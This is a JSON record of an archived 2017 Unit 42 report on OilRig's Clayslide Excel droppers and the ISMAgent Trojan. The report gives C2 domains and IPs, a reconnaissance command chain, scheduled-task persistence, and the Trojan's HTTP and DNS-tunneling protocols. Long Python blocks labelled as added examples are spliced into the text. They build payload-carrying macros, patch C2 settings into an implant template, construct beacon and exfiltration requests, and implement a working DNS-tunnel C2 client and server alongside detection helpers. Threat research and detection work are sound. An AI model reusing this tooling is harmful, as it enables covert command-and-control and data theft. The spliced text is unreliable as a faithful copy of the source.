{
	"id": "5a862fab-6c61-4d5e-9116-39c2ca9ab7fd",
	"created_at": "2026-04-06T00:18:56.946626Z",
	"updated_at": "2026-04-10T13:13:10.221896Z",
	"deleted_at": null,
	"sha1_hash": "855088aa14275eb4898176957ec27fe16012255c",
	"title": "OilRig Uses ISMDoor Variant; Possibly Linked to Greenbug Threat Group",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1407391,
	"plain_text": "OilRig Uses ISMDoor Variant; Possibly Linked to Greenbug Threat Group\r\nBy Robert Falcone, Bryan Lee\r\nPublished: 2017-07-27 · Archived: 2026-04-05 22:36:58 UTC\r\nUnit 42 has discovered activity involving the threat actors responsible for the OilRig campaign, with a potential link to a threat group known as Greenbug. Symantec first reported on this group in January 2017, detailing its operations and its use of a custom information-stealing Trojan called ISMDoor.\r\nIn July 2017, we observed an attack on a Middle Eastern technology organization that had also been targeted by the OilRig campaign in August 2016. Initial inspection of this attack suggested it was again the OilRig campaign using its existing toolset, but further examination revealed not only new variants of the delivery document we named Clayslide, but also a different payload embedded inside it. In the past, we had primarily associated the OilRig campaign with using Clayslide documents to deliver a Trojan we named Helminth; in this instance, the payload was instead a variant of the ISMDoor Trojan with significant modifications, which we are now tracking as ISMAgent.\r\nThe Attack\r\nOn July 16, 2017, actors associated with the OilRig campaign sent emails to five different individuals within the targeted organization. All of the emails had the same subject, attachment filename, and attached Excel file (SHA256: 3eb14b6705179590f0476d3d3cbd71665e7c1935ecac3df7b876edc9bd7641b6).\r\nWe identified the Excel file attached to the delivery email as a variant of the Clayslide delivery documents used by the OilR ig campaign. A closer look revealed that although it was similar to previous Clayslide documents, it also differed in several respects. Like the previous samples, it displays a worksheet titled “Incompatible” containing a banner that shows a fake compatibility warning message (Figure 1). 
The message is an attempt to trick the user into clicking the “Enable Content” button, which runs a malicious macro embedded within the Excel file.\r\nFigure 1 Incompatible message attempting to trick the victim into enabling macros\r\nThe macro within the delivery document unhides and displays a new worksheet that contains a fake invoice for Citrix products, as seen in Figure 2. This fake invoice acts as a decoy document to minimize the user’s suspicion that any malicious activity occurred.\r\nFigure 2 Decoy document opened to minimize suspicions of compromise\r\nWhile the macro displays the decoy invoice spreadsheet, it silently runs malicious code in the background to install its payload. The malicious code starts by concatenating several base64 encoded strings into a single variable. As you can see in the following code snippet, the variable name “Paltofp1” suggests that the author of this code may want our attention:\r\nhttps://researchcenter.paloaltonetworks.com/2017/07/unit42-oilrig-uses-ismdoor-variant-possibly-linked-greenbug-threat-group/\r\nPage 1 of 12\n\nThe macro then writes the concatenated base64 encoded data to the file %PUBLIC%\\Libraries\\B642.txt. It then reads the “B642.txt” file back in and decodes the data, saving the result to %PUBLIC%\\Libraries\\servicereset.exe (SHA256: 52366b9ab2eb1d77ca6719a40f4779eb302dca97a832bd447abf10512dc51ed9). The servicereset.exe file is the payload of this attack, a variant of ISMDoor that we track as ISMAgent.\r\nThe script then creates a file named %PUBLIC%\\Libraries\\OfficeServicesStatus.vbs containing a VBScript that executes the “servicereset.exe” file via the command line. 
Lastly, as a persistence mechanism, a scheduled task named “OfficeServicesStatus” is created, set to run every three minutes, as seen in Figure 3.\r\nFigure 3 Scheduled task created by the macro within the delivery document\r\nAn Iterative Task\r\nWhile hunting for other samples similar to the one observed in the attack against the technology organization, we discovered yet another variant of Clayslide (SHA256: 5ac939a5426db8614165bd8b6a02d3e8d9f167379c6ed28025bf3b37f1aea902). This sample was dated June 2017, a month older than the newest version containing ISMAgent. Based upon its timestamps and its similarities with both the original Clayslide documents and the newest ISMAgent-loaded ones, we believe this June 2017 sample to be an iterative version of Clayslide.\r\nThe June 2017 sample of Clayslide contained the same OfficeServicesStatus.vbs file found in the ISMAgent Clayslide document, but instead of having the payload embedded in the macro as segregated base64 strings to be concatenated, this variant obtained its payload from multiple cells within the “Incompatible” worksheet. This technique was observed in previous Clayslide documents to access the script variant of the Helminth Trojan in earlier OilRig attacks.\r\nThe June 2017 sample also contained artifacts observed in previous Clayslide documents, as documented in a blog post we published in April. Specifically, we found this comment:\r\nsource code from https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html\r\nalong with the following common function names within the macro code:\r\nPrivate Sub Workbook_Open()\r\n     Call fireeye_Init\r\n     Call fireeye_ShowHideSheets\r\nEnd Sub\r\nAlthough structurally the document was more similar to the originally discovered Clayslide documents, this June 2017 sample was designed to load ISMAgent instead of Helminth. 
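To make the macro behaviour described above reproducible, the following Python is an added example (it is not code from the Unit 42 post or from the Clayslide macro itself). It builds a constructed VBA fixture in the shape the page describes, with the base64 payload split across string literals that are concatenated into one variable, then carves the fragments back out, decodes them and reports the PE check and SHA256 an analyst would compare against the servicereset.exe hash above. The fixture payload, the 64-character fragment width and the assignment pattern the regex expects are assumptions; the June variant, which stores its base64 in worksheet cells rather than macro strings, is not covered.

```python
import base64
import hashlib
import re

Q = chr(34)  # the double-quote character, spelled out so the constructed VBA fixture stays readable

# Constructed stand-in for servicereset.exe: a real Clayslide document carries a full PE here.
FAKE_PAYLOAD = b'MZ' + bytes(58) + b'This program cannot be run in DOS mode.' + bytes(32)


def make_macro(payload: bytes, var: str = 'Paltofp1', width: int = 64) -> str:
    '''Builds a macro shaped like the one the page describes: the base64 payload
    is split into string literals that are concatenated into one variable.
    This is a test fixture, not the real Clayslide macro.'''
    b64 = base64.b64encode(payload).decode()
    pieces = [b64[i:i + width] for i in range(0, len(b64), width)]
    lines = ['Private Sub Workbook_Open()', '    Dim ' + var + ' As String',
             '    ' + var + ' = ' + Q + pieces[0] + Q]
    lines += ['    ' + var + ' = ' + var + ' & ' + Q + piece + Q for piece in pieces[1:]]
    lines.append('End Sub')
    return chr(10).join(lines)


def carve_base64_payload(vba: str, var: str = 'Paltofp1') -> bytes:
    '''Collects, in source order, every string literal assigned to var or appended
    to it with &, joins them and base64-decodes the result. Decoding is strict, so
    a fragment that was missed or mangled raises instead of yielding garbage.'''
    assign = re.compile(re.escape(var) + ' = (?:' + re.escape(var) + ' & )?'
                        + Q + '([A-Za-z0-9+/=]+)' + Q)
    fragments = assign.findall(vba)
    if not fragments:
        raise ValueError('no base64 fragments assigned to ' + var)
    return base64.b64decode(''.join(fragments), validate=True)


def triage(vba: str, var: str = 'Paltofp1') -> dict:
    '''What an analyst wants first from the carved blob: is it a PE, how big is it,
    and the SHA256 to compare against the hash reported for servicereset.exe.'''
    blob = carve_base64_payload(vba, var)
    return {'is_pe': blob[:2] == b'MZ', 'size': len(blob),
            'sha256': hashlib.sha256(blob).hexdigest()}


if __name__ == '__main__':
    print(triage(make_macro(FAKE_PAYLOAD)))
```

On a real document, feed carve_base64_payload the macro text dumped by an OLE/VBA extractor and the variable name seen in the Paltofp1 assignments; a strict decode failure usually means a fragment line was missed (for instance a VBA line continuation the regex does not expect).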
We do not have targeting details for this sample, although the decoy document has a theme similar to that of the newest Clayslide document, displaying vendor-related information (Figure 4).\r\nFigure 4 Decoy document\r\nA table displaying the differences between the Clayslide variants is below:\r\nFeature                    Original Clayslide   June Clayslide   Newest Clayslide\r\nHelminth                   X\r\nISMAgent                                        X                X\r\nOfficeServicesStatus                            X                X\r\nBase64 in multiple cells   X                    X\r\nSource code comment        X                    X\r\nTable 1 Comparison of Clayslide versions\r\nThe payload (SHA256: 52366b9ab2eb1d77ca6719a40f4779eb302dca97a832bd447abf10512dc51ed9) delivered in the July 2017 attack is a variant of the recent ISMDoor versions that use DNS tunneling for C2 communications. On May 1, 2017, Arbor Networks published research on ISMDoor using DNS tunneling to communicate with its C2 server, which is nearly identical to the DNS tunneling the payload of this attack carries out. Due to considerable differences, and evidence of potentially different authors, between the previous ISMDoor samples and this newly discovered variant, we are tracking this new variant as ISMAgent.\r\nOn-demand Configuration\r\nThe ISMAgent tool comes with a default configuration that specifies the C2 domain and the number of minutes between attempts to execute the tool. However, an actor can use command line arguments to create a new ISMAgent sample that is configured with a specified C2 domain and a specified number of minutes at which the Trojan is automatically executed. 
The following command line arguments are supported:\r\nArgument   Description\r\n-c         Configures a second domain to use for C2 communications\r\n-m         Configures the interval, in minutes, at which the scheduled task executes the payload\r\nTable 2 Command line options available in ISMAgent for configuration\r\nIf the Trojan is executed with these arguments, it reads in its own file data and searches for two strings of characters that it overwrites with the configured settings. The Trojan searches for a run of \"^\" characters that it overwrites with the C2 domain provided via the \"-c\" argument, and it searches for the string \"%%%%\" that it replaces with the number of minutes provided via the \"-m\" argument. The \"%%%%\" string exists within the following larger string, which the Trojan executes as a command to create a scheduled task named \"TimeUpdate\" that runs the payload after the specified number of minutes passes:\r\ncmd /c schtasks /query /tn TimeUpdate > NUL 2>&1 || schtasks /create /sc minute /mo %%%% /tn TimeUpdate /tr \\\"\\\\\\\"\r\nCommand and Control\r\nThe Trojan is able to use two mechanisms to communicate with its C2 server: HTTP requests and DNS tunneling. The DNS tunneling protocol found in this payload is remarkably similar to that of recent ISMDoor samples, as documented in Arbor Networks’ research. Similar message handling is found in both ISMAgent and ISMDoor, in addition to strings that exist in both samples, such as the hardcoded IPv6 values. The similarities may allow for backward compatibility between ISMAgent and ISMDoor C2 infrastructure. 
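The builder behaviour from the On-demand Configuration section, as an added example in Python (this is not ISMAgent code and not code from the Unit 42 post): it patches a constructed template the way the -c and -m arguments do, and pairs that with the triage check a responder would actually run, which tells an unconfigured builder copy from a configured sample and reads back the C2 domain and interval. The placeholder run length, the NUL filler, and the size-preserving padding of the domain and minute count are assumptions, and the template bytes are constructed rather than taken from a real sample.

```python
import re

NUL = bytes(1)
CARET_RUN = b'^' * 64          # placeholder for the C2 domain; its true length is not given on the page (assumption)
MINUTES_PLACEHOLDER = b'%%%%'  # placeholder for the schtasks /mo interval, as described on the page
TASK_CMD = (b'cmd /c schtasks /query /tn TimeUpdate > NUL 2>&1 || '
            b'schtasks /create /sc minute /mo %%%% /tn TimeUpdate /tr ')


def make_template() -> bytes:
    '''Constructed stand-in for an unconfigured ISMAgent file: the two placeholder
    strings surrounded by NUL filler. A real sample is a complete PE around them.'''
    return b'MZ' + bytes(64) + CARET_RUN + bytes(16) + TASK_CMD + bytes(32)


def configure(data: bytes, domain: str, minutes: int) -> bytes:
    '''Mimics the -c and -m handling: the caret run is overwritten with the domain
    and %%%% with the minute count. Both writes preserve the file size (domain
    NUL-padded to the run length, minutes space-padded to four characters), which
    keeps every offset in a PE valid; the page does not say whether the real builder
    does this, so it is an assumption of this example.'''
    start = data.find(b'^' * 8)
    if start < 0:
        raise ValueError('no caret placeholder: already configured or not this builder')
    end = start
    while end < len(data) and data[end] == ord('^'):
        end += 1
    dom = domain.encode()
    if len(dom) >= end - start:
        raise ValueError('domain does not fit in the placeholder')
    mo = str(minutes).encode().ljust(len(MINUTES_PLACEHOLDER))
    if len(mo) > len(MINUTES_PLACEHOLDER):
        raise ValueError('minute count must fit in four characters')
    patched = data[:start] + dom + bytes(end - start - len(dom)) + data[end:]
    return patched.replace(MINUTES_PLACEHOLDER, mo, 1)


def extract_config(sample: bytes, template: bytes) -> dict:
    '''Triage helper: tells an unconfigured builder copy from a configured sample and,
    for the latter, reads back the C2 domain and scheduled-task interval. The domain
    is read at the offset where the template carries its caret run, which a
    size-preserving patch leaves unchanged.'''
    configured = b'^' * 8 not in sample and MINUTES_PLACEHOLDER not in sample
    domain = None
    start = template.find(b'^' * 8)
    if configured and start >= 0:
        domain = sample[start:sample.find(NUL, start)].decode(errors='replace')
    m = re.search(b'/sc minute /mo ([0-9]+) +/tn TimeUpdate', sample)
    return {'configured': configured, 'domain': domain,
            'minutes': int(m.group(1)) if m else None}


if __name__ == '__main__':
    template = make_template()
    sample = configure(template, 'ntpupdateserver.com', 3)
    print(extract_config(template, template))
    print(extract_config(sample, template))
```

For hunting, the two placeholder strings themselves are the useful signature: a file on disk that still carries a long run of carets next to the TimeUpdate schtasks string is the unconfigured builder rather than a deployed implant.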
In the payloads themselves, a number of differences exist, enough that in essence they appear to be different tools.\r\nRegardless of the communications method used, the Trojan parses the data received from the C2 server for a GUID field that it uses as a unique identifier, as well as for commands it should run on the compromised system:\r\n[GUID provided by C2]#command#[URL to download file to system]#[command to execute via cmd.exe]#[path to filename to upload to C2]\r\nHTTP C2 Communications\r\nISMAgent prioritizes HTTP as its mechanism to communicate with the C2 server, but if it is unable to reach the C2 server it switches to the DNS tunneling mechanism. To carry out its HTTP C2 communications, the Trojan prepends \"www.\" to the configured C2 domain and issues a DNS query to resolve this name. The Trojan uses the resolved IP address as the host in the HTTP beacon request.\r\nFor instance, the sample used in this attack was configured to use ntpupdateserver[.]com for its C2 server. The HTTP C2 process would attempt to resolve the domain “www.ntpupdateserver[.]com”, which resolved to 142.54.179[.]90, so the Trojan would use the string “http://142.54.179[.]90” as the basis of the C2 URL. The initial beacon is sent from the Trojan to the C2 server using a URL structured in the following way:\r\nhttp://[IP of C2 domain]/action2/[base64 encoded hostname\\username]\r\nThe C2 server responds to this request with a command string using the previously mentioned format. 
During the attack on the technology organization, we observed the C2 server issuing the following command:\r\n2983b983-0acd-42db-9d86-0b096af5f369#command##systeminfo && ipconfig /all && net user && net user /domain && net group /domain && tasklist && netstat -an && net use#\r\nIf the C2 server provides a command to execute on the system, the Trojan executes it using cmd.exe and writes the output to %TEMP%\\runlog[random number].tmp. The Trojan then reads this runlog file and sends it to the C2 server via an HTTP POST request to a URL structured as follows:\r\nhttp://[IP of C2 domain]/response/[base64 encoded hostname\\username]/[GUID provided by C2]\r\nThe HTTP POST request contains an anomalous boundary value of “myboundary” and a hardcoded filename value of “a.a”, as seen below, which may be used to generate detection signatures for this behavior:\r\nPOST /response/[redacted]/2983b983-0acd-42db-9d86-0b096af5f369 HTTP/1.1\r\nHost: 142.54.179.90\r\nContent-Type: multipart/form-data; boundary=myboundary\r\nUser-Agent: Firefox\r\nContent-Length: 3868\r\nCache-Control: no-cache\r\n\r\n--myboundary\r\nContent-Type: application/octet-stream;charset=UTF-8\r\nContent-Disposition: form-data; name=\"file\"; filename=\"a.a\"\r\n\r\n[output of command prompt]\r\nWhile we did not observe the C2 server attempting to run additional commands via ISMAgent, we were able to analyze the Trojan itself to determine the functionality of its available commands. 
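The HTTP side of the protocol, as an added Python example that is not code from the Unit 42 post or from ISMAgent: it derives the beacon identifier from hostname and username with the same character replacement the page describes, parses the #-delimited command string into its five fields, rebuilds the multipart POST shown above, and implements the detection the page suggests (a POST to /response/ or /upload/ with the boundary myboundary and an upload named a.a). The hostname and username values are what the beacon identifier the page prints in the ISMAgent vs. ISMDoor section decodes to; the closing multipart boundary is an assumption, since the capture on the page ends at the command output.

```python
import base64

CRLF = chr(13) + chr(10)   # spelled out so the listing carries no escape sequences
BACKSLASH = chr(92)
Q = chr(34)
BOUNDARY = 'myboundary'    # hardcoded multipart boundary observed in ISMAgent POSTs
USER_AGENT = 'Firefox'     # hardcoded User-Agent observed in the same requests


def beacon_id(hostname: str, username: str) -> str:
    '''base64(hostname + backslash + username) with the URL-unsafe characters
    rewritten the way ISMAgent does: = becomes %3d, / becomes %2f, + becomes %2b.'''
    raw = (hostname + BACKSLASH + username).encode()
    return base64.b64encode(raw).decode().replace('=', '%3d').replace('/', '%2f').replace('+', '%2b')


def c2_urls(ip: str, ident: str, guid: str = '') -> dict:
    '''The three URL shapes the page documents, keyed by their role.'''
    base = 'http://' + ip
    return {'beacon': base + '/action2/' + ident,
            'response': base + '/response/' + ident + '/' + guid,
            'upload': base + '/upload/' + ident + '/' + guid}


def parse_command(message: str):
    '''Splits a C2 reply on # into the five documented fields. Anything with fewer
    fields is not a command; the PowerShell variant on this page bails out the same way.'''
    parts = message.split('#')
    if len(parts) < 5:
        return None
    return {'guid': parts[0], 'keyword': parts[1], 'download_url': parts[2],
            'shell_cmd': parts[3], 'upload_path': parts[4]}


def build_response_post(ip: str, ident: str, guid: str, output: bytes) -> bytes:
    '''Rebuilds the multipart POST shown on the page. The closing boundary line is
    assumed: the page listing ends at the command output.'''
    part = CRLF.join(['--' + BOUNDARY,
                      'Content-Type: application/octet-stream;charset=UTF-8',
                      'Content-Disposition: form-data; name=' + Q + 'file' + Q + '; filename=' + Q + 'a.a' + Q,
                      '', ''])
    body = part.encode() + output + (CRLF + '--' + BOUNDARY + '--' + CRLF).encode()
    head = CRLF.join(['POST /response/' + ident + '/' + guid + ' HTTP/1.1',
                      'Host: ' + ip,
                      'Content-Type: multipart/form-data; boundary=' + BOUNDARY,
                      'User-Agent: ' + USER_AGENT,
                      'Content-Length: ' + str(len(body)),
                      'Cache-Control: no-cache', '', ''])
    return head.encode() + body


def is_ismagent_post(raw: bytes) -> bool:
    '''Detection logic for the anomalies the page points at: a POST to /response/ or
    /upload/ whose Content-Type carries the literal boundary myboundary and whose
    body uploads a part named a.a. All three must hold.'''
    head, sep, body = raw.partition((CRLF + CRLF).encode())
    if not sep:
        return False
    lines = head.decode(errors='replace').split(CRLF)
    request = lines[0].split(' ')
    path_ok = (len(request) == 3 and request[0] == 'POST'
               and (request[1].startswith('/response/') or request[1].startswith('/upload/')))
    headers = {k.strip().lower(): v.strip()
               for k, _, v in (line.partition(':') for line in lines[1:])}
    boundary_ok = 'boundary=' + BOUNDARY in headers.get('content-type', '')
    filename_ok = ('filename=' + Q + 'a.a' + Q).encode() in body
    return path_ok and boundary_ok and filename_ok


if __name__ == '__main__':
    ident = beacon_id('OKO873802585598', '5h6GdN69a4tKH')   # decoded from the beacon the page shows
    reply = ('2983b983-0acd-42db-9d86-0b096af5f369#command##systeminfo && ipconfig /all '
             '&& net user && net user /domain && net group /domain && tasklist && netstat -an && net use#')
    cmd = parse_command(reply)
    print(c2_urls('142.54.179.90', ident, cmd['guid']))
    post = build_response_post('142.54.179.90', ident, cmd['guid'], b'Host Name: OKO873802585598')
    print(is_ismagent_post(post))
```

The three conditions in is_ismagent_post are deliberately combined: the literal boundary alone is rare enough to be interesting but a filename of a.a on a /response/ or /upload/ path with a User-Agent of just Firefox is what makes the match specific to this tool rather than to sloppy HTTP clients in general.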
If the command string contains a URL to download a file to the system, the Trojan simply uses the URLDownloadToFileA function to download and save the file to the %TEMP% folder on the target system. If the C2 server provides a path to a file it wishes to upload from the system, the Trojan opens the file, reads its contents, and uploads them via an HTTP POST to the following URL:\r\nhttp://[IP of C2 domain]/upload/[base64 encoded hostname\\username]/[GUID provided by C2]\r\nDNS Tunneling for C2\r\nISMAgent uses its DNS tunneling technique for C2 as a backup to its HTTP capability. This mechanism supports the same command message structure and even handles the commands in the same manner. The Trojan sends data to the C2 server via DNS queries by encoding the data and using the encoded string as a subdomain of an actor-owned domain. The C2 server can send data to the Trojan by resolving the DNS queries to IPv6 addresses that the Trojan treats as hexadecimal data.\r\nTo carry out its DNS C2 communications, the Trojan issues DNS queries to the C2 domain to obtain the AAAA records associated with the domain. The Trojan starts this process by creating a unique GUID and appending it to the string \"n.n.c.\" to create a subdomain to query in the following format:\r\nn.n.c.[session value based on GUID].[c2 domain]\r\n(ex: n.n.c.303E5CF0A861479B80E2.ntpupdateserver.com)\r\nTo respond to this beacon, the C2 domain's name server answers this query with a hardcoded IPv6 value of a67d:0db8:a2a1:7334:7654:4325:0370:2aa3. This value acts as an acknowledgement of the beacon. 
The Trojan then base64 encodes the HTTP C2 URL it was using and sends this data to the C2 by constructing and issuing the following DNS query:\r\n[base64 encoded data].[iterating sequence number].d.[session value based on GUID].[c2 domain]\r\n(ex: aHR0cDovLzE0M.0.d.303E5CF0A861479B80E2.ntpupdateserver.com)\r\nThe Trojan splits the base64 encoded data across several DNS queries, which we believe the C2 domain's name server pieces together using the supplied sequence numbers. The name server responds to each of these DNS queries with another hardcoded IPv6 value of a67d:0db8:85a3:4325:7654:8a2a:0370:7334 to notify the Trojan that it has received the data. After all of the data has been sent via DNS requests, the Trojan sends a final DNS query with the following structure to notify the C2 server that it has completed its data transfer:\r\nn.[iterating sequence number].f.[session value based on GUID].[c2 domain]\r\n(ex: n.8.f.303E5CF0A861479B80E2.ntpupdateserver.com)\r\nAfter notifying the C2 server that the data transfer has completed, the Trojan may issue additional DNS queries to signal that it is ready to receive data back from the C2 server, using the following domain name structure:\r\nwww.[iterating sequence number].r.[session value based on GUID].[c2 domain]\r\nThe DNS server then responds to these queries with additional IPv6 addresses that the Trojan treats as hexadecimal data, as described by Arbor Networks.\r\nInfrastructure\r\nThe ISMAgent payload embedded inside the newest variant of Clayslide used the C2 domain ntpupdateserver[.]com. 
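The DNS tunneling exchange from the preceding section, worked as an added Python example (not code from the Unit 42 post, from ISMAgent or from the PowerShell variant) that also covers the base64 substitution the page later shows for both the PowerShell script and ISMAgent (= to -, / to -s-, + to -p-). The client side produces the beacon, data, finish and receive query names; the server side, which doubles as a detector that can be replayed over a DNS query log, acknowledges with the two hardcoded IPv6 values, reassembles the data by sequence number, and hands data back as AAAA records that the client unpacks as raw bytes. The 13-character label size (it reproduces the first label the page shows and is consistent with the n.8.f example), the reply to the finish marker, and the 16-bytes-per-address downlink packing are assumptions.

```python
import base64
import ipaddress
import re

ACK_BEACON = 'a67d:0db8:a2a1:7334:7654:4325:0370:2aa3'  # hardcoded reply to the n.n.c. beacon
ACK_DATA = 'a67d:0db8:85a3:4325:7654:8a2a:0370:7334'    # hardcoded reply to each data query
LABEL_LEN = 13   # encoded characters per data query; the real chunking rule is not stated on the page (assumption)
SESSION = re.compile('^[0-9A-Fa-f]{16,32}$')   # 20 hex chars in the ISMAgent example, 32 in the PowerShell one


def dns_b64(data: bytes) -> str:
    '''base64 with the characters that cannot appear in a hostname rewritten:
    = becomes -, / becomes -s-, + becomes -p- (the substitution the page shows).'''
    return base64.b64encode(data).decode().replace('=', '-').replace('/', '-s-').replace('+', '-p-')


def dns_b64_decode(text: str) -> bytes:
    '''Inverse of dns_b64. Tokens are consumed left to right, because a chain of
    str.replace calls mis-splits sequences such as -s-p-p- (which encodes /p+).'''
    out, i = [], 0
    while i < len(text):
        if text.startswith('-s-', i):
            out.append('/'); i += 3
        elif text.startswith('-p-', i):
            out.append('+'); i += 3
        elif text[i] == '-':
            out.append('='); i += 1
        else:
            out.append(text[i]); i += 1
    return base64.b64decode(''.join(out))


def client_queries(session: str, domain: str, data: bytes) -> list:
    '''Every query name the Trojan issues for one transfer: the beacon, the data
    labels with an iterating sequence number, the finish marker and a receive poll.'''
    enc = dns_b64(data)
    chunks = [enc[i:i + LABEL_LEN] for i in range(0, len(enc), LABEL_LEN)]
    tail = '.' + session + '.' + domain
    names = ['n.n.c' + tail]
    names += [chunk + '.' + str(seq) + '.d' + tail for seq, chunk in enumerate(chunks)]
    names.append('n.' + str(len(chunks)) + '.f' + tail)
    names.append('www.0.r' + tail)
    return names


def classify(qname: str):
    '''Maps a query name onto the four message types, or None when it does not fit.
    Returns (kind, session, domain, sequence, data label).'''
    labels = qname.split('.')
    if len(labels) < 6 or not SESSION.match(labels[3]):
        return None
    first, seq, kind, session = labels[:4]
    domain = '.'.join(labels[4:])
    if kind == 'c' and first == 'n' and seq == 'n':
        return ('beacon', session, domain, None, None)
    if kind == 'd' and seq.isdigit():
        return ('data', session, domain, int(seq), first)
    if kind == 'f' and first == 'n' and seq.isdigit():
        return ('finish', session, domain, int(seq), None)
    if kind == 'r' and first == 'www' and seq.isdigit():
        return ('receive', session, domain, int(seq), None)
    return None


class Reassembler:
    '''The name server side (or a detector replaying a DNS log): answers with the
    acknowledgement addresses and rebuilds the transferred data once the finish
    marker arrives. Data handed back on a receive poll is packed into AAAA records,
    16 bytes per address, which is how the Trojan reads them.'''

    def __init__(self, downlink: bytes = b''):
        self.pending = {}     # session -> {sequence: label}
        self.completed = {}   # session -> reassembled bytes
        self.downlink = downlink

    def handle(self, qname: str):
        msg = classify(qname)
        if msg is None:
            return None
        kind, session, _domain, seq, label = msg
        if kind == 'beacon':
            self.pending[session] = {}
            return ACK_BEACON
        if kind == 'data':
            self.pending.setdefault(session, {})[seq] = label
            return ACK_DATA
        if kind == 'finish':
            parts = self.pending.pop(session, {})
            self.completed[session] = dns_b64_decode(''.join(parts[k] for k in sorted(parts)))
            return ACK_DATA   # the reply to the finish marker is not given on the page (assumption)
        padded = self.downlink.ljust(-(-len(self.downlink) // 16) * 16, bytes(1))
        return [str(ipaddress.IPv6Address(padded[i:i + 16])) for i in range(0, len(padded), 16)]


def ipv6_to_bytes(addresses: list) -> bytes:
    '''Client side: the AAAA answers to a receive poll are raw hexadecimal data.'''
    return b''.join(ipaddress.IPv6Address(a).packed for a in addresses)
```

Replayed over passive DNS or resolver logs, classify alone is a workable first-pass detector: a single client emitting n.n.c., numbered .d. labels and an n.N.f. marker under the same hex session label is the protocol, whatever the domain is called.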
The primary second-level domain has no IP resolution; instead, www.ntpupdateserver[.]com resolves for the HTTP C2 channel, and two specific subdomains, ns1.ntpupdateserver[.]com and ns2.ntpupdateserver[.]com, act as the actual DNS C2 handlers. The ISMAgent payload embedded inside the June version used a completely different C2 domain, microsoft-publisher[.]com, but used the exact same domain name structure. Lastly, we were able to identify a third sample of ISMAgent leveraging another unique C2 domain, adobeproduct[.]com.\r\nntpupdateserver[.]com\r\nmicrosoft-publisher[.]com\r\nadobeproduct[.]com\r\nFigure 5 Primary C2 domains for ISMAgent\r\nPivoting from the WHOIS registrant email address paul.mcalister[at]mail.com revealed four additional highly suspect domains:\r\nfireeyeupdate[.]com\r\nchrome-dns[.]com\r\ntatavpnservices[.]com\r\nmiedafire[.]com\r\nPivoting on the WHOIS phone number, we found two additional domains. These are registered with the same registrar and have the same WHOIS address, but carry the registrant name “bolips Angelio” and the email address bolips[at]outlook.com.\r\ncache-service[.]net\r\nlevel3-resolvers[.]net\r\nThematically, these domains follow the pattern of ISMAgent and OilRig C2 domain names, using typo-squatting techniques in an attempt to appear legitimate. Each of these additional domains had the same structure as the three ISMAgent C2 domains: no IP resolution on the primary second-level domain, with www, ns1, and ns2 subdomains attached to it. 
Based on the shared registrant email address and domain name structure, it is highly probable that these other domains are also part of the ISMAgent infrastructure as C2 servers.\r\nThe third ISMAgent sample's C2 domain, adobeproduct[.]com, again fits thematically and was also found to have the www, ns1, and ns2 subdomains attached to it.\r\nThese findings are diagrammed below:\r\nFigure 6 ISMAgent C2 Infrastructure\r\nISMAgent vs. ISMDoor\r\nOn the surface, the ISMAgent payload appears similar to the ISMDoor payload, sharing functionality such as a specific DNS tunneling protocol. However, closer analysis shows enough differences between the two payloads to justify tracking ISMAgent as its own tool with its own name.\r\nFirst, all known ISMDoor payloads using DNS tunneling were created for 64-bit architectures, while all known ISMAgent payloads are x86 only. The most recent ISMDoor payloads using DNS tunneling have abandoned HTTP as a C2 communications method, in contrast to earlier ISMDoor samples, whereas ISMAgent uses HTTP as the primary method and DNS tunneling as a secondary method to communicate with its C2 server.\r\nAlso, while the DNS tunneling protocol is the same, the messages within the transmitted encoded data differ dramatically. After the initial \"n.n.c.\" beacon, ISMAgent sends the HTTP C2 URL as the data via the DNS tunneling protocol to send a beacon to its C2. During our analysis, we observed the sample used in this attack sending the following data immediately after the initial beacon:\r\nhttp://142.54.179[.]90/action2/T0tPODczODAyNTg1NTk4XDVoNkdkTjY5YTR0S0g%3d||\r\nComparatively, ISMDoor sends a much more involved series of messages to the C2 server in order to get a command. 
The following is the sequence of messages sent from the ISMDoor Trojan to its C2 server via the DNS tunneling protocol, the last message (\"M:GAC?\") resulting in a command for the Trojan to run:\r\n1. M:CC?\r\n2. M:ME?appId=-1&message=Executed Successfully\r\n3. M:AV?appId=-1&uniqueId=00000000-0000-0000-0000-000000000000\r\n4. M:AV?appId=[appId provided by C2]&uniqueId=[GUID provided by C2]\r\n5. M:GAC?appId=[appId provided by C2]\r\nLastly, the commands available within ISMAgent and ISMDoor are very different. As mentioned previously, ISMAgent has a far more limited but flexible command set, allowing an adversary to upload and download files, in addition to command execution via the command prompt. The most recent version of ISMDoor (v 10.0.192, SHA256: aa52dcaf6df43c6aa872fe0f73725f61e082d32c33fc976741d4eca17679533d), on the other hand, has a more comprehensive yet more rigid command set:\r\nChangeAliveSeconds\r\nChangeAddress\r\nSI\r\nGetConfig\r\nRunNewVersion\r\nrestart\r\nremove\r\nFastAlive\r\nExecuteKL\r\nGetVersion\r\nPauseUpload\r\nResumeUpload\r\nPauseDownload\r\nResumeDownload\r\nPWS\r\nImmediateResetRam\r\nFrom Helminth to ISMAgent\r\nDuring our data collection process, we discovered a Clayslide delivery document (SHA256: ca8cec08b4c74cf68c71a39176bfc8ee1ae4372f98f75c892706b2648b1e7530) from September 2016 containing a payload that appeared to be the Helminth script variant found in other Clayslide documents, but which upon further examination was wholly different. The macro within this Clayslide document obtains a PowerShell script from a cell in the “Incompatible” worksheet, much like previous samples. 
The macro then saves a VBScript to %PUBLIC%\\Libraries\\LicenseCheck.vbs to run this PowerShell script every 3 minutes.\r\nLike the Helminth script variants, this PowerShell script is a malicious payload that uses both HTTP requests and DNS tunneling to interact with its C2 server. However, the HTTP requests and the protocol employed to perform DNS tunneling differ dramatically from the Helminth scripts installed by all other known Clayslide samples. The HTTP requests and DNS tunneling protocol found in this PowerShell script are instead identical to those of ISMAgent.\r\nThe C2 domain used for this script was mslicensecheck[.]com, which had previously been reported by LogRhythm in their OilRig whitepaper. Interestingly, it was the only domain associated with OilRig that did not have an IP resolution at its second level, much like the ISMAgent samples.\r\nThe “doIt” function within the PowerShell script, seen in Figure 7, is responsible for initiating the C2 communications, as well as parsing the data provided by the C2 server to run the appropriate commands. This function uses the strings “/action2/”, “/response/” and “/upload/” within the C2 URLs when using HTTP to communicate with the C2 server. This behavior and these strings were also observed in the ISMAgent C2 behavior. 
